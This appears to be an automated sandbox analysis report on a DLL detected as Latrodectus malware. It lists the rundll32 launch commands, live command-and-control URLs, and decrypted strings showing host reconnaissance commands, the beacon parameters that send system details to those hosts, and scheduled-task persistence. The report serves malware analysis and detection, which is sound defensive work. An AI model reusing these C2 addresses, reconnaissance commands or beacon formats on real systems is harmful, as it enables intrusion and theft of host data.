Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Imagebase:	0x7ff740e60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:39:23
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:39:26
Start date:	08/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
Imagebase:	0x7ff617b80000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.7%
Total number of Nodes:	1023
Total number of Limit Nodes:	10

Source: https://winarkamaps.com/q	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/comp	Avira URL Cloud: Label: phishing
Source: https://stratimasesstr.com/F	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/al	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/live/l	Avira URL Cloud: Label: phishing
Source: https://winarkamaps.com/%	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/m/=	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/live/$	Avira URL Cloud: Label: phishing
Source: https://stratimasesstr.com/live/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/F	Avira URL Cloud: Label: malware

Source: winarkamaps.com	Virustotal: Detection: 20%	Perma Link
Source: stratimasesstr.com	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/live/	Virustotal: Detection: 18%	Perma Link
Source: https://stratimasesstr.com/	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/live/F	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/	Virustotal: Detection: 20%	Perma Link
Source: https://stratimasesstr.com/live/	Virustotal: Detection: 15%	Perma Link

Source: Malware configuration extractor	URLs: https://winarkamaps.com/live/
Source: Malware configuration extractor	URLs: https://stratimasesstr.com/live/

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: global traffic	DNS traffic detected: DNS query: winarkamaps.com
Source: global traffic	DNS traffic detected: DNS query: stratimasesstr.com

Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	Virustotal: Detection: 79%			Perma Link

Source: r2iL9TLvO3.dll	String decryptor: /c ipconfig /all
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c systeminfo
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c nltest /domain_trusts
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net view /all /domain
Source: r2iL9TLvO3.dll	String decryptor: /c nltest /domain_trusts /all_trusts
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net view /all
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: &ipconfig=
Source: r2iL9TLvO3.dll	String decryptor: /c net group "Domain Admins" /domain
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net config workstation
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c whoami /groups
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: &systeminfo=
Source: r2iL9TLvO3.dll	String decryptor: &domain_trusts=
Source: r2iL9TLvO3.dll	String decryptor: &domain_trusts_all=
Source: r2iL9TLvO3.dll	String decryptor: &net_view_all_domain=
Source: r2iL9TLvO3.dll	String decryptor: &net_view_all=
Source: r2iL9TLvO3.dll	String decryptor: &net_group=
Source: r2iL9TLvO3.dll	String decryptor: &wmic=
Source: r2iL9TLvO3.dll	String decryptor: &net_config_ws=
Source: r2iL9TLvO3.dll	String decryptor: &net_wmic_av=
Source: r2iL9TLvO3.dll	String decryptor: &whoami_group=
Source: r2iL9TLvO3.dll	String decryptor: "pid":
Source: r2iL9TLvO3.dll	String decryptor: "%d",
Source: r2iL9TLvO3.dll	String decryptor: "proc":
Source: r2iL9TLvO3.dll	String decryptor: "%s",
Source: r2iL9TLvO3.dll	String decryptor: "subproc": [
Source: r2iL9TLvO3.dll	String decryptor: &proclist=[
Source: r2iL9TLvO3.dll	String decryptor: "pid":
Source: r2iL9TLvO3.dll	String decryptor: "%d",
Source: r2iL9TLvO3.dll	String decryptor: "proc":
Source: r2iL9TLvO3.dll	String decryptor: "%s",
Source: r2iL9TLvO3.dll	String decryptor: "subproc": [
Source: r2iL9TLvO3.dll	String decryptor: &desklinks=[
Source: r2iL9TLvO3.dll	String decryptor: .
Source: r2iL9TLvO3.dll	String decryptor: "%s"
Source: r2iL9TLvO3.dll	String decryptor: Update_%x
Source: r2iL9TLvO3.dll	String decryptor: Custom_update
Source: r2iL9TLvO3.dll	String decryptor: .dll
Source: r2iL9TLvO3.dll	String decryptor: .exe
Source: r2iL9TLvO3.dll	String decryptor: Updater
Source: r2iL9TLvO3.dll	String decryptor: "%s"
Source: r2iL9TLvO3.dll	String decryptor: rundll32.exe
Source: r2iL9TLvO3.dll	String decryptor: "%s", %s %s
Source: r2iL9TLvO3.dll	String decryptor: runnung
Source: r2iL9TLvO3.dll	String decryptor: :wtfbbq
Source: r2iL9TLvO3.dll	String decryptor: %d
Source: r2iL9TLvO3.dll	String decryptor: %s%s
Source: r2iL9TLvO3.dll	String decryptor: files/bp.dat
Source: r2iL9TLvO3.dll	String decryptor: %s\%d.dll
Source: r2iL9TLvO3.dll	String decryptor: %d.dat
Source: r2iL9TLvO3.dll	String decryptor: %s\%s
Source: r2iL9TLvO3.dll	String decryptor: init -zzzz="%s\%s"
Source: r2iL9TLvO3.dll	String decryptor: front
Source: r2iL9TLvO3.dll	String decryptor: /files/
Source: r2iL9TLvO3.dll	String decryptor: Facial
Source: r2iL9TLvO3.dll	String decryptor: .exe
Source: r2iL9TLvO3.dll	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: r2iL9TLvO3.dll	String decryptor: POST
Source: r2iL9TLvO3.dll	String decryptor: GET
Source: r2iL9TLvO3.dll	String decryptor: curl/7.88.1
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: CLEARURL
Source: r2iL9TLvO3.dll	String decryptor: URLS
Source: r2iL9TLvO3.dll	String decryptor: COMMAND
Source: r2iL9TLvO3.dll	String decryptor: ERROR
Source: r2iL9TLvO3.dll	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: r2iL9TLvO3.dll	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: <html>
Source: r2iL9TLvO3.dll	String decryptor: <!DOCTYPE
Source: r2iL9TLvO3.dll	String decryptor: %s%d.dll
Source: r2iL9TLvO3.dll	String decryptor: 12345
Source: r2iL9TLvO3.dll	String decryptor: &stiller=
Source: r2iL9TLvO3.dll	String decryptor: %s%d.exe
Source: r2iL9TLvO3.dll	String decryptor: LogonTrigger
Source: r2iL9TLvO3.dll	String decryptor: %x%x
Source: r2iL9TLvO3.dll	String decryptor: TimeTrigger
Source: r2iL9TLvO3.dll	String decryptor: PT1H%02dM
Source: r2iL9TLvO3.dll	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: r2iL9TLvO3.dll	String decryptor: &mac=
Source: r2iL9TLvO3.dll	String decryptor: %02x
Source: r2iL9TLvO3.dll	String decryptor: :%02x
Source: r2iL9TLvO3.dll	String decryptor: PT0S
Source: r2iL9TLvO3.dll	String decryptor: &computername=%s
Source: r2iL9TLvO3.dll	String decryptor: &domain=%s
Source: r2iL9TLvO3.dll	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: r2iL9TLvO3.dll	String decryptor: \*.dll
Source: r2iL9TLvO3.dll	String decryptor: %04X%04X%04X%04X%08X%04X
Source: r2iL9TLvO3.dll	String decryptor: %04X%04X%04X%04X%08X%04X
Source: r2iL9TLvO3.dll	String decryptor: \Registry\Machine\
Source: r2iL9TLvO3.dll	String decryptor: https://winarkamaps.com/live/
Source: r2iL9TLvO3.dll	String decryptor: https://stratimasesstr.com/live/
Source: r2iL9TLvO3.dll	String decryptor: AppData
Source: r2iL9TLvO3.dll	String decryptor: Desktop
Source: r2iL9TLvO3.dll	String decryptor: Startup
Source: r2iL9TLvO3.dll	String decryptor: Personal
Source: r2iL9TLvO3.dll	String decryptor: Local AppData
Source: r2iL9TLvO3.dll	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: r2iL9TLvO3.dll	String decryptor: \update_data.dat
Source: r2iL9TLvO3.dll	String decryptor: URLS
Source: r2iL9TLvO3.dll	String decryptor: URLS\|%d\|%s

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r2iL9TLvO3.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
r2iL9TLvO3.dll